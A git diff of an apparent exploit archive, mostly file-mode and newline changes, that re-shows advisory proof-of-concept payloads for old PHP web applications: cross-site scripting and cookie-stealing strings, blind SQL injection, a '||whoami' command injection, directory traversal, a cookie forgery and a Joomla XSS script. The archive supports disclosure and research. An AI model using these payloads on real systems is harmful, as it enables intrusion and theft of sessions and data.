a/platforms/php/webapps/32935.txt b/platforms/php/webapps/32935.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32936.txt b/platforms/php/webapps/32936.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32937.txt b/platforms/php/webapps/32937.txt old mode 100755 new mode 100644 index 2fe033f5b..f03ed2f58 --- a/platforms/php/webapps/32937.txt +++ b/platforms/php/webapps/32937.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Online Contact Manager 3.0 is vulnerable; other versions may also be affected. -http://www.example.com/delete.php?id=+<script>alert(123)</script> \ No newline at end of file +http://www.example.com/delete.php?id=+<script>alert(123)</script> \ No newline at end of file diff --git a/platforms/php/webapps/32941.txt b/platforms/php/webapps/32941.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32948.txt b/platforms/php/webapps/32948.txt old mode 100755 new mode 100644 index eea8a0842..1bc0d6e73 --- a/platforms/php/webapps/32948.txt +++ b/platforms/php/webapps/32948.txt @@ -8,4 +8,4 @@ New5starRating 1.0 is vulnerable; other versions may also be affected. Supplying the following to the vulnerable script is sufficient to exploit this issue: -Username : admin 'or' 1=1 \ No newline at end of file +Username : admin 'or' 1=1 \ No newline at end of file diff --git a/platforms/php/webapps/32950.txt b/platforms/php/webapps/32950.txt old mode 100755 new mode 100644 index 6f0ed52a6..83acfd60e --- a/platforms/php/webapps/32950.txt +++ b/platforms/php/webapps/32950.txt @@ -4,4 +4,4 @@ Flat Calendar is prone to an HTML-injection vulnerability because it fails to su Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. -"><script>alert("ZoRLu")</script> \ No newline at end of file +"><script>alert("ZoRLu")</script> \ No newline at end of file diff --git a/platforms/php/webapps/32952.txt b/platforms/php/webapps/32952.txt old mode 100755 new mode 100644 index 1d08dc64c..6d00bc982 --- a/platforms/php/webapps/32952.txt +++ b/platforms/php/webapps/32952.txt @@ -4,4 +4,4 @@ CS Whois Lookup is prone to a remote command-execution vulnerability because the Successful attacks can compromise the affected software and possibly the computer. -http://www.example.com/path/index.php?ip=||whoami \ No newline at end of file +http://www.example.com/path/index.php?ip=||whoami \ No newline at end of file diff --git a/platforms/php/webapps/32958.txt b/platforms/php/webapps/32958.txt old mode 100755 new mode 100644 index c037ee303..3ae6a2fb8 --- a/platforms/php/webapps/32958.txt +++ b/platforms/php/webapps/32958.txt @@ -4,4 +4,4 @@ MataChat is prone to multiple cross-site scripting vulnerabilities because it fa An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials. -http://www.example.com/[path]/input.php?nickname=[XSS]&color=[XSS] \ No newline at end of file +http://www.example.com/[path]/input.php?nickname=[XSS]&color=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/32960.txt b/platforms/php/webapps/32960.txt old mode 100755 new mode 100644 index 495749a70..caf55a599 --- a/platforms/php/webapps/32960.txt +++ b/platforms/php/webapps/32960.txt @@ -10,4 +10,4 @@ The following example data and URI are available: [email]qwe@[twitter]dodo style=`top:expr/* */ession/*bypassed*/(alert(/yahoo/))`do[/twitter]example.com[/email] -http://www.example.com/index.php?app=core&module=ajax&section=register&do=check-display-name&name[]= \ No newline at end of file +http://www.example.com/index.php?app=core&module=ajax&section=register&do=check-display-name&name[]= \ No newline at end of file diff --git a/platforms/php/webapps/32963.txt b/platforms/php/webapps/32963.txt old mode 100755 new mode 100644 index dd22b9542..1b4c4b162 --- a/platforms/php/webapps/32963.txt +++ b/platforms/php/webapps/32963.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to Coppermine Photo Gallery 1.4.22 are vulnerable. -http://www.example.com/docs/showdoc.php?css=1>"><ScRiPt%20%0a%0d>alert(123)%3B</ScRiPt> \ No newline at end of file +http://www.example.com/docs/showdoc.php?css=1>"><ScRiPt%20%0a%0d>alert(123)%3B</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/32966.txt b/platforms/php/webapps/32966.txt old mode 100755 new mode 100644 index 18ec554b2..da265578a --- a/platforms/php/webapps/32966.txt +++ b/platforms/php/webapps/32966.txt @@ -6,4 +6,4 @@ An attacker may leverage the HTML-injection issue to execute arbitrary script co MyBB 1.4.5 is vulnerable; other versions may also be affected. -http://www.example.com/somefile.png?"><script>alert('xss')</script> \ No newline at end of file +http://www.example.com/somefile.png?"><script>alert('xss')</script> \ No newline at end of file diff --git a/platforms/php/webapps/32969.txt b/platforms/php/webapps/32969.txt old mode 100755 new mode 100644 index 49e9c1db7..290ef7970 --- a/platforms/php/webapps/32969.txt +++ b/platforms/php/webapps/32969.txt @@ -4,4 +4,4 @@ IceWarp Merak Mail Server is prone to a cross-site scripting vulnerability becau An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks. -<img src=&#x26;&#x23;&#x78;&#x36;&#x61;&#x3b;&#x26;&#x23;&#x78;&#x36; &#x31;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x36;&#x3b;&#x26;&#x23;&#x78; &#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x33;&#x3b;&#x26;&#x23; &#x78;&#x36;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26; &#x23;&#x78;&#x36;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x30;&#x3b; &#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x61; &#x3b;&#x26;&#x23;&#x78;&#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x36; &#x63;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x35;&#x3b;&#x26;&#x23;&#x78; &#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23; &#x78;&#x32;&#x38;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x34;&#x3b;&#x26; &#x23;&#x78;&#x33;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x39;&#x3b;> \ No newline at end of file +<img src=&#x26;&#x23;&#x78;&#x36;&#x61;&#x3b;&#x26;&#x23;&#x78;&#x36; &#x31;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x36;&#x3b;&#x26;&#x23;&#x78; &#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x33;&#x3b;&#x26;&#x23; &#x78;&#x36;&#x33;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x32;&#x3b;&#x26; &#x23;&#x78;&#x36;&#x39;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x30;&#x3b; &#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x61; &#x3b;&#x26;&#x23;&#x78;&#x36;&#x31;&#x3b;&#x26;&#x23;&#x78;&#x36; &#x63;&#x3b;&#x26;&#x23;&#x78;&#x36;&#x35;&#x3b;&#x26;&#x23;&#x78; &#x37;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x37;&#x34;&#x3b;&#x26;&#x23; &#x78;&#x32;&#x38;&#x3b;&#x26;&#x23;&#x78;&#x33;&#x34;&#x3b;&#x26; &#x23;&#x78;&#x33;&#x32;&#x3b;&#x26;&#x23;&#x78;&#x32;&#x39;&#x3b;> \ No newline at end of file diff --git a/platforms/php/webapps/3297.htm b/platforms/php/webapps/3297.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32976.php b/platforms/php/webapps/32976.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32983.txt b/platforms/php/webapps/32983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32985.xml b/platforms/php/webapps/32985.xml old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32988.txt b/platforms/php/webapps/32988.txt old mode 100755 new mode 100644 index 2b0997fa9..34598db6d --- a/platforms/php/webapps/32988.txt +++ b/platforms/php/webapps/32988.txt @@ -9,4 +9,4 @@ The issues affect VerliAdmin 0.3.7 and 0.3.8; other versions may also be affecte http//www.example.com/index.php?q=bantest&nick="><script>alert(String.fromCharCode(88,83,83))</script> http//www.example.com/index.php?nick="'/><script>alert(String.fromCharCode(88,83,83))</script> http//www.example.com/index.php?q="'/><script>alert(String.fromCharCode(88,83,83))</script> -http//www.example.com/index.php?"'/><script>alert(String.fromCharCode(88,83,83))</script> \ No newline at end of file +http//www.example.com/index.php?"'/><script>alert(String.fromCharCode(88,83,83))</script> \ No newline at end of file diff --git a/platforms/php/webapps/32989.txt b/platforms/php/webapps/32989.txt old mode 100755 new mode 100644 index e6f74bf1e..0aa86accb --- a/platforms/php/webapps/32989.txt +++ b/platforms/php/webapps/32989.txt @@ -8,4 +8,4 @@ The issues affect Verlihub Control Panel 1.7e; other versions may also be affect http://www.example.com/index.php?page=login&nick="><script>alert("Vulnerable");</script> http://www.example.com/index.php?page=login&nick="><iframe src= -http://www.example.com/index.html?news></iframe> \ No newline at end of file +http://www.example.com/index.html?news></iframe> \ No newline at end of file diff --git a/platforms/php/webapps/32991.txt b/platforms/php/webapps/32991.txt old mode 100755 new mode 100644 index fb2c2f0cb..c5c181818 --- a/platforms/php/webapps/32991.txt +++ b/platforms/php/webapps/32991.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Claroline 1.8.11 is vulnerable; other versions may also be affected. -http://www.example.com/referer/?"><script>alert(123)</script><a%20href=" \ No newline at end of file +http://www.example.com/referer/?"><script>alert(123)</script><a%20href=" \ No newline at end of file diff --git a/platforms/php/webapps/32992.txt b/platforms/php/webapps/32992.txt old mode 100755 new mode 100644 index 1be0ce7a0..8d5191ff6 --- a/platforms/php/webapps/32992.txt +++ b/platforms/php/webapps/32992.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML or JavaScript code could run in the context of the affect MagpieRSS 0.72 is vulnerable; other versions may also be affected. -http://www.example.com/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script http://www.example.com/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script <?xml version="1.0" encoding="utf-8"?> <rss version="2.0" xml:base="http://www.example.com" xmlns:dc="http://purl.org/dc/elements/1.1/"> <channel> <title>Justin.MadIrish.net <script>alert('xss title');</script>- Justin&#039;s Personal Homepage</title> <link>http://www.example.com</link> <description>Close personal friends with Evil Eve.</description> <language>en</language> <item> <title>Disturbing<script>alert('xss title');</script> XSS<script>alert('xss title');</script></title> <link>http://www.example.com/node/343 <script>alert('xss link');</script></link> <description>foobar</description> <pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate> <dc:creator>justin</dc:creator> <guid isPermaLink="false">343 at http://www.example.com</guid> </item> </channel> </rss> \ No newline at end of file +http://www.example.com/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script http://www.example.com/magpierss-0.72/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script <?xml version="1.0" encoding="utf-8"?> <rss version="2.0" xml:base="http://www.example.com" xmlns:dc="http://purl.org/dc/elements/1.1/"> <channel> <title>Justin.MadIrish.net <script>alert('xss title');</script>- Justin&#039;s Personal Homepage</title> <link>http://www.example.com</link> <description>Close personal friends with Evil Eve.</description> <language>en</language> <item> <title>Disturbing<script>alert('xss title');</script> XSS<script>alert('xss title');</script></title> <link>http://www.example.com/node/343 <script>alert('xss link');</script></link> <description>foobar</description> <pubDate>Wed, 04 Mar 2009 13:42:09 +0000</pubDate> <dc:creator>justin</dc:creator> <guid isPermaLink="false">343 at http://www.example.com</guid> </item> </channel> </rss> \ No newline at end of file diff --git a/platforms/php/webapps/32993.txt b/platforms/php/webapps/32993.txt old mode 100755 new mode 100644 index dc5883be0..b3fdbcaf4 --- a/platforms/php/webapps/32993.txt +++ b/platforms/php/webapps/32993.txt @@ -12,4 +12,4 @@ Dacio's Image Gallery 1.6 is vulnerable; other versions may also be affected. The following example URI for the directory-traversal vulnerability is available: -http://www.example.com/Dacio_imgGal-v1.6/index.php?gallery=../config.inc%00 \ No newline at end of file +http://www.example.com/Dacio_imgGal-v1.6/index.php?gallery=../config.inc%00 \ No newline at end of file diff --git a/platforms/php/webapps/33000.txt b/platforms/php/webapps/33000.txt old mode 100755 new mode 100644 index af30311ea..6d4250d23 --- a/platforms/php/webapps/33000.txt +++ b/platforms/php/webapps/33000.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to Cacti 0.8.7b are vulnerable. -http://www.example.com/cacti/data_input.php?action="><SCRIPT>alert("XSS")</SCRIPT> \ No newline at end of file +http://www.example.com/cacti/data_input.php?action="><SCRIPT>alert("XSS")</SCRIPT> \ No newline at end of file diff --git a/platforms/php/webapps/33001.ssh b/platforms/php/webapps/33001.ssh old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33002.txt b/platforms/php/webapps/33002.txt old mode 100755 new mode 100644 index 134c3bfc6..bffe2c7e3 --- a/platforms/php/webapps/33002.txt +++ b/platforms/php/webapps/33002.txt @@ -10,4 +10,4 @@ Profense 2.4.4 Profense 2.2.22 http://www.example.com/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass -http://www.example.com/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E \ No newline at end of file +http://www.example.com/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E \ No newline at end of file diff --git a/platforms/php/webapps/33003.txt b/platforms/php/webapps/33003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33004.txt b/platforms/php/webapps/33004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33005.txt b/platforms/php/webapps/33005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33006.txt b/platforms/php/webapps/33006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33008.txt b/platforms/php/webapps/33008.txt old mode 100755 new mode 100644 index ea95002fb..3855442e2 --- a/platforms/php/webapps/33008.txt +++ b/platforms/php/webapps/33008.txt @@ -10,4 +10,4 @@ http://www.example.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOI if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/* -http://www.example.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS] \ No newline at end of file +http://www.example.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/33011.txt b/platforms/php/webapps/33011.txt old mode 100755 new mode 100644 index 4bf80c54e..e129509c3 --- a/platforms/php/webapps/33011.txt +++ b/platforms/php/webapps/33011.txt @@ -10,4 +10,4 @@ The following sample request is available: GET http://www.example.com/PHP-Nuke-8.0/index.php HTTP/1.0 Accept: */* -referer: '+IF(False,'',SLEEP(5))+' \ No newline at end of file +referer: '+IF(False,'',SLEEP(5))+' \ No newline at end of file diff --git a/platforms/php/webapps/33013.txt b/platforms/php/webapps/33013.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33014.txt b/platforms/php/webapps/33014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33021.txt b/platforms/php/webapps/33021.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33022.txt b/platforms/php/webapps/33022.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33030.txt b/platforms/php/webapps/33030.txt old mode 100755 new mode 100644 index 91e34f7bb..b5baeeaaa --- a/platforms/php/webapps/33030.txt +++ b/platforms/php/webapps/33030.txt @@ -30,5 +30,4 @@ file_exists("admin/" . $admin . ".php")) { . ".php"); } -----------[exploit Fin] - \ No newline at end of file +----------[exploit Fin] \ No newline at end of file diff --git a/platforms/php/webapps/33038.txt b/platforms/php/webapps/33038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3305.txt b/platforms/php/webapps/3305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33052.txt b/platforms/php/webapps/33052.txt old mode 100755 new mode 100644 index 613215661..7ba4a923b --- a/platforms/php/webapps/33052.txt +++ b/platforms/php/webapps/33052.txt @@ -10,4 +10,4 @@ The following examples are available: echo -n 10000nidemBASEUserRole | md5sum -javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e; path=/" \ No newline at end of file +javascript:document.cookie="BASERole=10000|nidem|794b69ad33015df95578d5f4a19d390e; path=/" \ No newline at end of file diff --git a/platforms/php/webapps/33057.txt b/platforms/php/webapps/33057.txt old mode 100755 new mode 100644 index 271e2d950..3b4c8ca45 --- a/platforms/php/webapps/33057.txt +++ b/platforms/php/webapps/33057.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Aardvark Topsites PHP 5.2.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?a=search&q=psstt+securityâ~@~]><a+href%3Dhttp%3A%2F%2Fwebsec.id3as.com>Web-Application-Security \ No newline at end of file +http://www.example.com/index.php?a=search&q=psstt+securityâ~@~]><a+href%3Dhttp%3A%2F%2Fwebsec.id3as.com>Web-Application-Security \ No newline at end of file diff --git a/platforms/php/webapps/33060.txt b/platforms/php/webapps/33060.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33061.php b/platforms/php/webapps/33061.php old mode 100755 new mode 100644 index 736eff526..fb04ac99c --- a/platforms/php/webapps/33061.php +++ b/platforms/php/webapps/33061.php @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect versions prior to 1.5.12. -/* PoC: XSS Joomla 1.5.11 Juan Galiana Lara Internet Security Auditors Jun 2009 */ /* config */ $site='localhost'; $path='/joomla-1.5.11'; $cookname='d85558a8cf943386aaa374896bfd3d99'; $cookvalue='4ab56fdd83bcad86289726aead602699'; class cURL { var $headers; var $user_agent; var $compression; var $cookie_file; var $proxy; /* evil script */ var $xss='alert("PWN PWN PWN: " + document.cookie);'; function cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') { $this->headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; $this->headers[] = 'Connection: Keep-Alive'; $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; $this->headers[] = 'Referer: ">get('http://' . $site . $path . '/index.php?option=com_content&view=article&layout=form'); /* let's execute some javascript.. }:-)*/ echo $c; ?> \ No newline at end of file +/* PoC: XSS Joomla 1.5.11 Juan Galiana Lara Internet Security Auditors Jun 2009 */ /* config */ $site='localhost'; $path='/joomla-1.5.11'; $cookname='d85558a8cf943386aaa374896bfd3d99'; $cookvalue='4ab56fdd83bcad86289726aead602699'; class cURL { var $headers; var $user_agent; var $compression; var $cookie_file; var $proxy; /* evil script */ var $xss='alert("PWN PWN PWN: " + document.cookie);'; function cURL($cookies=TRUE,$cookie='cookies.txt',$compression='gzip',$proxy='') { $this->headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; $this->headers[] = 'Connection: Keep-Alive'; $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; $this->headers[] = 'Referer: ">get('http://' . $site . $path . '/index.php?option=com_content&view=article&layout=form'); /* let's execute some javascript.. }:-)*/ echo $c; ?> \ No newline at end of file diff --git a/platforms/php/webapps/33065.txt b/platforms/php/webapps/33065.txt old mode 100755 new mode 100644 index a9ad82df9..20cd9c4c2 --- a/platforms/php/webapps/33065.txt +++ b/platforms/php/webapps/33065.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to Horde 'Passwd' 3.1.1 are vulnerable. -http://www.example.com/horde/passwd/main.php?backend="><script>alert('XSS')</script>&userid=stevejobs&return_to=&oldpassword=foo&newpassword0=foo&newpassword1=foo&submit=Change%20Password \ No newline at end of file +http://www.example.com/horde/passwd/main.php?backend="><script>alert('XSS')</script>&userid=stevejobs&return_to=&oldpassword=foo&newpassword0=foo&newpassword1=foo&submit=Change%20Password \ No newline at end of file diff --git a/platforms/php/webapps/33068.txt b/platforms/php/webapps/33068.txt old mode 100755 new mode 100644 index a5e70f96e..2b3bb0189 --- a/platforms/php/webapps/33068.txt +++ b/platforms/php/webapps/33068.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ClanSphere 2009.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?mod=search&action=list&text="'><script>alert('xss')</script>&where=0&submit=Suchen \ No newline at end of file +http://www.example.com/index.php?mod=search&action=list&text="'><script>alert('xss')</script>&where=0&submit=Suchen \ No newline at end of file diff --git a/platforms/php/webapps/33072.txt b/platforms/php/webapps/33072.txt old mode 100755 new mode 100644 index 06bb86929..2ba52a22c --- a/platforms/php/webapps/33072.txt +++ b/platforms/php/webapps/33072.txt @@ -23,5 +23,4 @@ Code : } -----------[exploit Fin] - \ No newline at end of file +----------[exploit Fin] \ No newline at end of file diff --git a/platforms/php/webapps/33075.txt b/platforms/php/webapps/33075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33076.txt b/platforms/php/webapps/33076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33085.txt b/platforms/php/webapps/33085.txt old mode 100755 new mode 100644 index 7c60cbfef..cf4cfd0a1 --- a/platforms/php/webapps/33085.txt +++ b/platforms/php/webapps/33085.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The following example URI is available: -http://www.example.com/easy_image/main.php?action=detail&id= XSS TO ADD: 1>'><ScRiPt%20%0a%0d>alert(334415002616)%3B</ScRiPt> \ No newline at end of file +http://www.example.com/easy_image/main.php?action=detail&id= XSS TO ADD: 1>'><ScRiPt%20%0a%0d>alert(334415002616)%3B</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/33087.txt b/platforms/php/webapps/33087.txt old mode 100755 new mode 100644 index fffe26509..d28c4f4ad --- a/platforms/php/webapps/33087.txt +++ b/platforms/php/webapps/33087.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc PHPLive! 3.2.1 and 3.2.2 are vulnerable; other versions may also be affected. -http://www.example.com/phplive/request.php?l=admin&x=1 AND 1=1 \ No newline at end of file +http://www.example.com/phplive/request.php?l=admin&x=1 AND 1=1 \ No newline at end of file diff --git a/platforms/php/webapps/3309.txt b/platforms/php/webapps/3309.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33091.txt b/platforms/php/webapps/33091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33097.txt b/platforms/php/webapps/33097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33098.txt b/platforms/php/webapps/33098.txt old mode 100755 new mode 100644 index 6a3396ab6..d964d6d00 --- a/platforms/php/webapps/33098.txt +++ b/platforms/php/webapps/33098.txt @@ -4,4 +4,4 @@ Programs Rating Script is prone to multiple cross-site scripting vulnerabilities An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/rating/postcomments.php?id=1>'><ScRiPt %0A%0D>alert(360824593944)%3B</ScRiPt> \ No newline at end of file +http://www.example.com/rating/postcomments.php?id=1>'><ScRiPt %0A%0D>alert(360824593944)%3B</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/3310.php b/platforms/php/webapps/3310.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33102.txt b/platforms/php/webapps/33102.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33106.txt b/platforms/php/webapps/33106.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33107.txt b/platforms/php/webapps/33107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33108.txt b/platforms/php/webapps/33108.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33109.txt b/platforms/php/webapps/33109.txt old mode 100755 new mode 100644 index 11755e7a5..238f89e05 --- a/platforms/php/webapps/33109.txt +++ b/platforms/php/webapps/33109.txt @@ -4,4 +4,4 @@ PG Matchmaking is prone to multiple cross-site scripting vulnerabilities because An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/services.php?id="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/services.php?id="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/3311.php b/platforms/php/webapps/3311.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33110.txt b/platforms/php/webapps/33110.txt old mode 100755 new mode 100644 index 8e6a5645a..6bc9e2ee6 --- a/platforms/php/webapps/33110.txt +++ b/platforms/php/webapps/33110.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br The issues affect XZeroScripts XZero Community Classifieds 4.97.8; other versions may also be vulnerable. http://www.example.com/xzero_classifieds/?_xzcal_m=6&_xzcal_y=1<body+onload=alert(318724525577)> -http://www.example.com/xzero_classifieds/index.php?cityid=1777&view=post&postevent=1"+onmouseover=alert(390684711834)+ \ No newline at end of file +http://www.example.com/xzero_classifieds/index.php?cityid=1777&view=post&postevent=1"+onmouseover=alert(390684711834)+ \ No newline at end of file diff --git a/platforms/php/webapps/33111.txt b/platforms/php/webapps/33111.txt old mode 100755 new mode 100644 index ea26f1e16..a84c41732 --- a/platforms/php/webapps/33111.txt +++ b/platforms/php/webapps/33111.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th AIOCP 1.4.001 is vulnerable; other versions may also be affected. -http://www.example.com/public/code/cp_html2txt.php?page=[SHELL] \ No newline at end of file +http://www.example.com/public/code/cp_html2txt.php?page=[SHELL] \ No newline at end of file diff --git a/platforms/php/webapps/33112.txt b/platforms/php/webapps/33112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33113.txt b/platforms/php/webapps/33113.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33114.txt b/platforms/php/webapps/33114.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33115.txt b/platforms/php/webapps/33115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33116.txt b/platforms/php/webapps/33116.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33117.txt b/platforms/php/webapps/33117.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33119.txt b/platforms/php/webapps/33119.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33120.txt b/platforms/php/webapps/33120.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/33121.txt b/platforms/php/webapps/33121.txt old mode 100755 new mode 100644 index 7455659fa..1931d1829 --- a/platforms/php/webapps/33121.txt +++ b/platforms/php/webapps/33121.txt @@ -5,4 +5,4 @@ PG eTraining is prone to multiple cross-site scripting vulnerabilities because i An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. http://www.example.com/lessons_login.php?btn=start&cur=[XSS] -http://www.example.com/lessons_login.php?id=[XSS] \ No newline at end of file +http://www.example.com/lessons_login.php?id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/33122.txt b/platforms/php/webapps/33122.txt old mode 100755 new mode 100644 index 97a1c42de..72aa9a2bd --- a/platforms/php/webapps/33122.txt +++ b/platforms/php/webapps/33122.txt @@ -4,4 +4,4 @@ The 'com_user' component for Joomla! is prone to a remote URI-redirection vulner A successful exploit may aid in phishing attacks. -http://www.example.com/path/index.php?option=com_user&lang=fr&view=[SITE] \ No newline at end of file +http://www.example.com/path/index.php?option=com_user&lang=fr&view=[SITE] \ No newline at end of file diff --git a/platforms/php/webapps/33125.txt b/platforms/php/webapps/33125.txt old mode 100755 new mode 100644 index 7c7b9dfae..4ed30b52d --- a/platforms/php/webapps/33125.txt +++ b/platforms/php/webapps/33125.txt @@ -7,4 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Permis 1.0 is vulnerable; other versions may also be affected. http://www.example.com/index.php?option=com_groups&task=list&id=25 and substring(@@version,1,1)=4 -http://www.example.com/index.php?option=com_groups&task=list&id=25 and substring(@@version,1,1)=5 \ No newline at end of file +http://www.example.com/index.php?option=com_groups&task=list&id=25 and substring(@@version,1,1)=5 \ No newline at end of file diff --git a/platforms/php/webapps/33126.txt b/platforms/php/webapps/33126.txt old mode 100755 new mode 100644 index 95b819cfe..ab64d4a72 --- a/platforms/php/webapps/33126.txt +++ b/platforms/php/webapps/33126.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The issue affects Matterdaddy Market 1.2, 1.1, 1.051, 1.04, and 1.03; other versions may also be affected. -http://www.example.com/index.php?q="><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/index.php?q="><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/php/webapps/33127.txt b/platforms/php/webapps/33127.txt old mode 100755 new mode 100644 index f3a15b07f..dc59d27c2 --- a/platforms/php/webapps/33127.txt +++ b/platforms/php/webapps/33127.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Site Builder module for Miniweb 2.0 is affected. 